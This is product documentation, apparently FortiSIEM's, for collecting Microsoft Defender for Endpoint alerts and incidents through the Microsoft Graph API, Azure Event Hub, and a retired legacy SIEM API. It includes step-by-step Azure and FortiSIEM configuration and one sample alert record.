Microsoft Defender for Endpoint (Previously Microsoft Windows Defender Advanced Threat Protection (ATP))
There are two methods to ingest Microsoft Defender for Endpoint audit log data.
The existing method makes use of Azure Event Hub, see Configuration - Setup in Azure.
FortiSIEM also offers a new ingest method using the Microsoft Graph API, utilizing the Generic HTTPS Polling feature in FortiSIEM 6.6.0 and later.
This integration uses the Microsoft Graph APIs as of this writing. See Configuring Microsoft Graph Incident API using Generic HTTPS Poller and Configuring Microsoft Graph Alert API using Generic HTTPS Poller.
Configuring Microsoft Graph Incident API using Generic HTTPS Poller or Configuring Microsoft Graph Alert API using Generic HTTPS Poller
The MSDefender 365 Graph Incidents and Alerts APIs for MS365 Defender report data for all Defender services in Azure:
-
Microsoft Defender for Endpoint
-
Microsoft Defender Vulnerability Management
-
Microsoft Defender for Office 365
-
Microsoft Defender for Identity
-
Microsoft Defender for Cloud Apps
You may need to enable the API to work in your tenant.
Using the Generic HTTPS Poller feature, we have two pre-built integrations for the MS365 Defender API endpoints:
-
https://graph.microsoft.com/v1.0/security/incidents
Reference: https://learn.microsoft.com/en-us/graph/api/security-list-incidents?view=graph-rest-1.0&tabs=http
-
https://graph.microsoft.com/v1.0/security/alerts_v2
Reference: https://learn.microsoft.com/en-us/graph/api/security-list-alerts_v2?view=graph-rest-1.0&tabs=http
You will create two credentials using the "HTTPS Advanced" protocol, each representing the API call to each endpoint. There are two pre-defined definition files that you can import from this documentation. Use the following links for complete setup instructions.
Main Topics:
Configuration
The following Configuration Options are available:
-
Configuring Microsoft Graph Incident API using Generic HTTPS Poller
Note: For general information on Generic HTTPS Poller, see Generic Log API Poller (HTTPS Advanced) Integration.
-
Configuring Microsoft Graph Alert API using Generic HTTPS Poller
Note: For general information on Generic HTTPS Poller, see Generic Log API Poller (HTTPS Advanced) Integration.
Configuring Microsoft Graph Incident API using Generic HTTPS Poller
To configure Microsoft Graph Incident API, you will need to perform setup in Azure and in FortiSIEM by taking the following steps.
Setup in Azure
Take the following steps to generate credential for the API. This process is the same for the Incident API and Alert API. If this setup was completed for either API, it does not need to be repeated again. In this situation, go to Setup in FortiSIEM for the respective API (Incident, Alert).
-
Sign in to the Azure Portal.
-
Navigate to Azure Active Directory > App registrations.
-
Click New registration.
-
Select the new App, and select the Overview tab.
-
Get the Application (client) ID and the Directory (tenant) ID, and save it. It will be used in Setup in FortiSIEM.
-
Click API permissions > Add a permission, and select Microsoft Graph. This adds permission of Microsoft Threat Protection > Application Permission > SecurityAlert.Read.All and SecurityIncident.Read.All to allow this App to access incident/alert API.
-
Click API permissions > Grant admin consent for Default Directory, and click Yes to granted admin consent for the requested permissions.
-
Navigate to Certificates & secrets > Client secrets, and click New client secret to generate a new client secret.
-
Record the value for Setup in FortiSIEM.
Proceed with Setup FortiSIEM Credential to call the MS365 Defender Graph Incidents API Endpoint or Setup FortiSIEM to call the MS365 Defender Graph Alerts_v2 API Endpoint.
Setup FortiSIEM Credential to call the MS365 Defender Graph Incidents API Endpoint
To configure the Microsoft Incident API to FortiSIEM, take the following steps.
Create a New Device/Application
-
Navigate to ADMIN > Device Support > Devices/Apps.
-
Click New.
-
From the Device/Application Type Definition dialog box, take the following steps.
-
From the Category drop-down list, select Device.
-
In the Vendor field, enter "WindowsDefenderIncident".
-
In the Model field, enter "Windows Defender".
-
In the Version field, enter the version number, for example, "1".
-
From the Device/App Group drop-down list, select Server.
-
From the Access Protocol drop-down list, remove SSH, SNMP, and TELNET.
-
From the Access Protocol drop-down list, select HTTPS Advanced.
-
Click Save.
-
Create the Credentials Configuration
-
Navigate to ADMIN > Setup > Credentials.
-
Under Step 1: Enter Credentials, click New.
-
In the Name field, enter a name, for example "Windows Defender Incident".
-
From the Device Type drop-down list, select the device type you just created in Create a New Device/Application.
-
From the Authentication drop-down list, select Oauth2.0.
-
Download the following file: MicrosoftWindowsDefenderIncidentAPI_http_advanced_definition.json.
-
Click Import Definition.
-
Select the file you just downloaded from step 6, and click Import.
-
Click Yes to overwrite.
-
Click on the General Parameters icon, and take the following steps.
-
In the Host Name field, confirm the information is "https://graph.microsoft.com".
-
In the URI Stem field, confirm the input is "/v1.0/security/incidents".
-
From the HTTP Method drop-down list, the selection should be GET.
-
The Disable SSL Certificate Check check box should be unchecked.
-
The JSON Response Log Key field should be "value".
-
The Log Header field should be "Microsoft 365 Defender Incident".
-
Click OK.
-
-
Click the Authentication Parameters icon, and take the following steps.
-
With the General tab selected, take the following steps.
-
In the Access Token URL field, enter "https://login.microsoftonline.com/{Tenant ID}/oauth2/v2.0/token" where {Tenant ID} is the tenant ID you recorded from Setup in Azure.
-
In the Client Id field, enter the Client ID you recorded from Setup in Azure.
-
In the Client Secret field, enter the client secret you recorded from Setup in Azure.
-
Click OK.
-
-
Click Save.
-
Create the Credentials Mapping
-
Under Step 2: Enter IP Range to Credential Associations, click New.
-
From the Device Credential Mapping Definition dialog box, take the following steps.
-
In the IP/Host Name field, enter "graph.microsoft.com".
-
From the Credentials drop-down list, select the credential you just created.
-
Click Save.
-
Test the Credential
-
Ensure the credentials mapping you just created is selected. If not, select it.
-
Under Step 2: Enter IP Range to Credentials Association, click the Test drop-down list, and select Test Connectivity without Ping.
If successful, the new job will appear in the ADMIN > Setup Pull Events table. Events can then be queried in ANALYTICS.
If you encounter an error, refer to Common Errors for additional information that may help you resolve the issue.
Configuring Microsoft Graph Alert API using Generic HTTPS Poller
To configure Microsoft Graph Alert API, you will need to perform setup in Azure and in FortiSIEM by taking the following steps. If you have already done the setup in Azure for the Incident API, you can skip Setup in Azure, and proceed immediately to Setup FortiSIEM to call the MS365 Defender Graph Alerts_v2 API Endpoint.
Setup FortiSIEM to call the MS365 Defender Graph Alerts_v2 API Endpoint
To configure the Microsoft Alert API to FortiSIEM, take the following steps.
Create a New Device/Application
-
Navigate to ADMIN > Device Support > Devices/Apps.
-
Click New.
-
From the Device/Application Type Definition dialog box, take the following steps.
-
From the Category drop-down list, select Device.
-
In the Vendor field, enter "WindowsDefenderAlert".
-
In the Model field, enter "Windows Defender".
-
In the Version field, enter the version number, for example, "1".
-
From the Device/App Group drop-down list, select Server.
-
From the Access Protocol drop-down list, remove SSH, SNMP, and TELNET.
-
From the Access Protocol drop-down list, select HTTPS Advanced.
-
Click Save.
-
Create the Credentials Configuration
-
Navigate to ADMIN > Setup > Credentials.
-
Under Step 1: Enter Credentials, click New.
-
In the Name field, enter a name, for example "Windows Defender Alert".
-
From the Device Type drop-down list, select the device type you just created in Create a New Device/Application.
-
From the Authentication drop-down list, select Oauth2.0.
-
Download the following file: MicrosoftWindowsDefenderAlertAPI_http_advanced_definition.json.
-
Click Import Definition.
-
Select the file you just downloaded from step 6, and click Import.
-
Click Yes to overwrite.
-
Click on the General Parameters icon, and take the following steps.
-
In the Host Name field, confirm the information is "https://graph.microsoft.com".
-
In the URI Stem field, confirm the input is "/v1.0/security/alerts_v2".
-
From the HTTP Method drop-down list, the selection should be GET.
-
The Disable SSL Certificate Check check box should be unchecked.
-
The JSON Response Log Key field should be "value".
-
The Log Header field should be "Microsoft 365 Defender Alert".
-
Click OK.
-
-
Click the Authentication Parameters icon, and take the following steps.
-
With the General tab selected, take the following steps.
-
In the Access Token URL field, enter "https://login.microsoftonline.com/{Tenant ID}/oauth2/v2.0/token" where {Tenant ID} is the tenant ID you recorded from Setup in Azure.
-
In the Client Id field, enter the Client ID you recorded from Setup in Azure.
-
In the Client Secret field, enter the client secret you recorded from Setup in Azure.
-
Click OK.
-
-
Click Save.
-
Create the Credentials Mapping
-
Under Step 2: Enter IP Range to Credential Associations, click New.
-
From the Device Credential Mapping Definition dialog box, take the following steps.
-
In the IP/Host Name field, enter "graph.microsoft.com".
-
From the Credentials drop-down list, select the credential you just created.
-
Click Save.
-
Test the Credential
-
Ensure the credentials mapping you just created is selected. If not, select it.
-
Under Step 2: Enter IP Range to Credentials Association, click the Test drop-down list, and select Test Connectivity without Ping.
If successful, the new job will appear in the ADMIN > Setup Pull Events table. Events can then be queried in ANALYTICS.
If you encounter an error, refer to Common Errors for additional information that may help you resolve the issue.
Configuration via Azure Event Hub
To configure Microsoft Defender for Endpoint event forwarding to Azure event hub, you will be taking the following general actions.
-
Create an Event Hub Namespace and Event Hub if one does not already exist.
-
Create SAS Policy and generate primary SAS key for authentication.
-
Record the Event Hub Name Space, Event Hub Name, SAS Policy Name, Primary Key, and consumer group for FortiSIEM configuration/authentication.
-
Configure FortiSIEM for Azure Event hub integration and do test Pull.
-
Configure Microsoft Defender for Endpoint raw data streaming to allow event forwarding to Azure Event Hub created earlier.
-
Confirm Raw events are parsed.
Take the steps here to configure Microsoft Defender for Endpoint.
Azure Event Hub Configuration
Create an Event Hub Namespace and Event Hub
Complete these steps in the Azure Portal:
Step 1: Create a Resource Group in Azure
Note: If you already have a Resource Group to use, skip this section
A resource group is a logical collection of Azure resources. All resources are deployed and managed in a resource group. To create a resource group:
- Login to the Azure portal: https://portal.azure.com/
- Click Resource groups in the left navigation pane.
- Click Add.
- For Subscription, select the name of the Azure subscription in which you want to create the resource group.
- Enter a unique name for the resource group, The system immediately checks to see if the name is available in the currently selected Azure subscription.
- Select a Region for the resource group.
- Click Review + Create.
- Click Create on the Review + Create page.
Note: In the example used in Step 2, a Resource Group called fsm1
was created.
Step 2: Create an Event Hub Namespace
An Event Hub namespace provides a unique scoping container, referenced by its fully-qualified domain name, in which you create one or more event hubs. To create a namespace in your resource group using the portal, complete the following steps:
- In the Azure portal, click Create a resource at the top left of the screen.
- In the “Search the Market text box, enter Select All services in the left menu, select star (*) next to Event Hubs, and then click the Create button in the ANALYTICS category.
- On the Create namespace page, complete the following steps:
- Enter a name for the namespace. The system immediately checks to see if the name is available.
- Choose the pricing tier (Basic or Standard).
- Select the subscription in which you want to create the namespace.
- Select a location for the namespace.
- Click Create. You may have to wait a few minutes for the system to fully provision the resources.
- Refresh the Event Hubs page to see the event hub namespace. You can check the status of the event hub creation in the alerts.
- Select the namespace. You see the home page for your Event Hubs Namespace in the portal.
Step 3: Create an Event Hub
To create an event hub within the namespace, follow these steps:
- In the Event Hubs Namespace page, click Event Hubs in the left menu.
- At the top of the window, click + Event Hub.
- Enter a name for your event hub, then click Create.
- You can check the status of the event hub creation in alerts. After the event hub is created, you see it in the list of event hubs.
Step 4: Configure an Event Hub Namespace
- Select an event hub namespace and go to Shared access policies, and then click +Add. Enter the Policy name, check the Manage box, and then click Create.
- Select one of the Shared Access policies just created.
- The Azure Python SDK needs the SAS Policy name (defined in step 4.1) and the Primary key when creating the credential in FortiSIEM. Copy the primary key and policy name to a text editor for later use.
Note: When the event hub namespace is created, Azure will also create a default Shared Access Policy named RootManageSharedAcessKey.
- Select an event hub namespace and go to Event Hubs.
- Select an event hub and go to Consumer group. You can click +Consumer group or use default group name $default.
Note: If you have selected Basic (1 Consumer Group), then there will be no option to add a another Consumer group.
Configuration in FortiSIEM
Complete these steps in the FortiSIEM UI:
- Go to the ADMIN > Setup > Credentials tab.
- In Step 1: Enter Credentials:
- Follow the instructions in "Setting Credentials" in the User's Guide to create a new credential.
- Enter these settings in the Access Method Definition dialog box and click Save:
Settings Description Name Enter a name for the credential Device Type Microsoft Azure Event Hub Access Protocol AZURE PYTHON SDK Pull Interval The interval in which FortiSIEM will pull events from Azure Event Hub. Default is 5 minutes. Event Hub Namespace The name of the Azure event hub namespace Event Hub Name The name of the Azure event hub. SAS Policy Name Shared Access (SAS) Policy Name Primary Key The name of the primary key Consumer Group The name of the consumer group Description Description of the device Based on the example screenshots, this is the configuration in FortiSIEM:
- In Step 2: Enter IP Range to Credential Associations, click New.
- Enter a host name, an IP, or an IP range in the IP/Host Name field. For this integration, enter "azure.com".
- Select the name of your Azure event hub credential from the Credentials drop-down list.
- Click Save.
- Click the Test drop-down list and select Test Connectivity to test the connection to Azure event hub.
- To see the jobs associated with Azure, select ADMIN > Setup > Pull Events.
- To see the received events select ANALYTICS, then enter "Azure" in the search box.
Note: Azure services must be configured to write to the Event Hub before there are any events to be collected.
Microsoft Defender for Endpoint Configuration
For the latest Microsoft Defender for Endpoint information, see https://docs.microsoft.com/en-us/microsoft-365/security/defender/streaming-api-event-hub?view=o365-worldwide.
Ensure the following steps have been taken before proceeding.
-
An event hub has been created in your tenant.
-
Your contributor permissions has been configured.
Note: If it hasn't, log in to your Azure tenant, navigate to Subscriptions > Your subscription > Resource Providers > Register to Microsoft.insights, and configure your contributor permissions.
After your event hub namespace has been created, take the following actions.
-
Define the user who will be logging into Microsoft 365 Defender as Contributor.
-
If you are connecting to an application, add the App Registration Service Principal as Reader, Azure Event Hub Data Receiver (this can also be done at Resource Group or Subscription level) by navigating to Event hubs namespace > Access control (IAM) > Add and verifying under Role assignments.
Enable raw data streaming by taking the following steps.
-
Log in to the Microsoft 365 Defender as a Global Administrator or Security Administrator.
-
Go to the Data export settings page in the Microsoft Defender portal.
-
Click on Add data export settings.
-
Choose a name for your new settings.
-
Choose Forward events to Azure Event Hubs.
-
Type your Event Hubs name and your Event Hubs resource ID.
To get your Event Hubs resource ID, go to your Azure Event Hubs namespace page on Azure > properties tab > copy the text under Resource ID.
-
Choose the events you want to stream and click Save.
On the next pull interval, you should see ingested Defender for Endpoint data.
{"category":"AdvancedHunting-AlertInfo","operationName":"Publish","properties":{"AlertId":"da637801291442337370_2831234","AttackTechniques":"[\"Ingress Tool Transfer (T1105)\",\"Deobfuscate/Decode Files or Information (T1140)\",\"Signed Script Proxy Execution (T1216)\",\"Signed Binary Proxy Execution (T1218)\",\"CMSTP (T1218.003)\",\"InstallUtil (T1218.004)\",\"Mshta (T1218.005)\",\"Regsvr32 (T1218.010)\",\"Rundll32 (T1218.011)\",\"XSL Script Processing (T1220)\"]","Category":"Execution","DetectionSource":"EDR","MachineGroup":null,"ServiceSource":"Microsoft Defender for Endpoint","Severity":"Low","Timestamp":"2022-02-10T22:29:51.4127262Z","Title":"Use of living-off-the-land binary to run malicious code"},"tenantId":"cdf65b83-41f2-4c0e-97ee-11111111111","time":"2022-02-10T22:32:24.5796030Z"}
[Legacy] Microsoft Defender for Endpoint (Previously Microsoft Windows Defender Advanced Threat Protection (ATP) )
Note: This is a Legacy configuration.
As of November 2021, Microsoft has retired the Microsoft Defender ATP SIEM APIs. Defender ATP has also been relabeled as “Microsoft Defender for Endpoint”. All integrations using the SIEM APIs will cease to function after the Microsoft Defender for Endpoint SIEM API Deprecation date of April 1st, 2022.
Please follow the configuration guide to configure Defender for Endpoint event forwarding to Azure event hub.
LEGACY
- Integration Points
- Configuring Windows Defender for FortiSIEM REST API Access
- Configuring FortiSIEM for Windows Defender ATP REST API Access
Integration Points
Protocol | Information Discovered | Used For |
---|---|---|
Windows Defender API REST API | Security and Compliance |
Configuring Windows Defender for FortiSIEM REST API Access
Legacy
Microsoft provides ample documentation here.
Follow the steps specified in 'Enabling SIEM integration', repeated here.
- Login to Windows Defender Center.
- Go to Settings > SIEM.
- Select Enable SIEM integration.
- Choose Generic API.
- Click Save Details to File.
- Click Generate Tokens.
Configuring FortiSIEM for Windows Defender ATP REST API Access
Legacy
Use the account in the previous step to enable FortiSIEM access. Complete these steps in the FortiSIEM UI by first logging in to the FortiSIEM Supervisor node.
-
Define Windows Defender ATP REST API Access Credential in FortiSIEM
-
Create IP Range to Credential Association and Test Connectivity
Define Windows Defender ATP REST API Access Credential in FortiSIEM
- Go to the ADMIN > Setup > Credentials tab.
- In Step 1: Enter Credentials:
- Follow the instructions in "Setting Credentials" in the User's Guide to create a new credential.
- Enter these settings in the Access Method Definition dialog box and click Save:
-
Settings Description Name Enter a name for the credential Device Type Microsoft Windows Defender ATP Access Protocol Windows Defender ATP Alert REST API Tenant ID Enter the Tenant ID for the credential created through the process here. Password config - For Manual, enter the Client ID and Client Secret for the credential created here. For CyberArk SDK, see CyberArk SDK Password Configuration. For CyberArk REST API, see CyberArk REST API Password Configuration.
Organization Choose an organization if it is an MSP deployment and the same credential is to be used for multiple customers. Description Description of the device.
Create IP Range to Credential Association and Test Connectivity
From the FortiSIEM Supervisor node, take the following steps.
- In Step 2: Enter IP Range to Credential Associations, click New.
- Select the name of the credential created in step 2 Configuring FortiSIEM for Windows Defender ATP REST API Access from the Credentials drop-down list.
- The IP/Host Name field will be automatically filled, but if you wish to change the region, click on the IP/Host Name field, and select one of the following:
EU: wdatp-alertexporter-eu.windows.com/api/alerts
US: wdatp-alertexporter-us.windows.com/api/alerts
UK: wdatp-alertexporter-uk.windows.com/api/alerts
If Government Community Cloud (GCC), GCC High, or Deparment of Defense (DoD) is required, enter the appropriate host name in the IP/Host Name field.
GCC: wdatp-alertexporter-us.gcc.securitycenter.windows.usGCC High and DoD: wdatp-alertexporter-us.securitycenter.windows.us
- Click Save.
- Select the entry just created and click the Test drop-down list and select Test Connectivity without Ping. A pop up will appear and show the Test Connectivity results.
- An entry will be created in ADMIN > Setup > Pull Events corresponding to this event pulling job. FortiSIEM will start to pull events from Windows Defender Center using the REST API.
Viewing Events
To view events received via Windows Defender ATP REST API, take the following steps:
- Go to ADMIN > Setup > Pull Events.
- Select the Windows Defender ATP entry and click Report.
The system will take you to the ANALYTICS tab and run a query to display the events received from Windows Defender Center in the last 15 minutes. You can modify the time interval to get more events.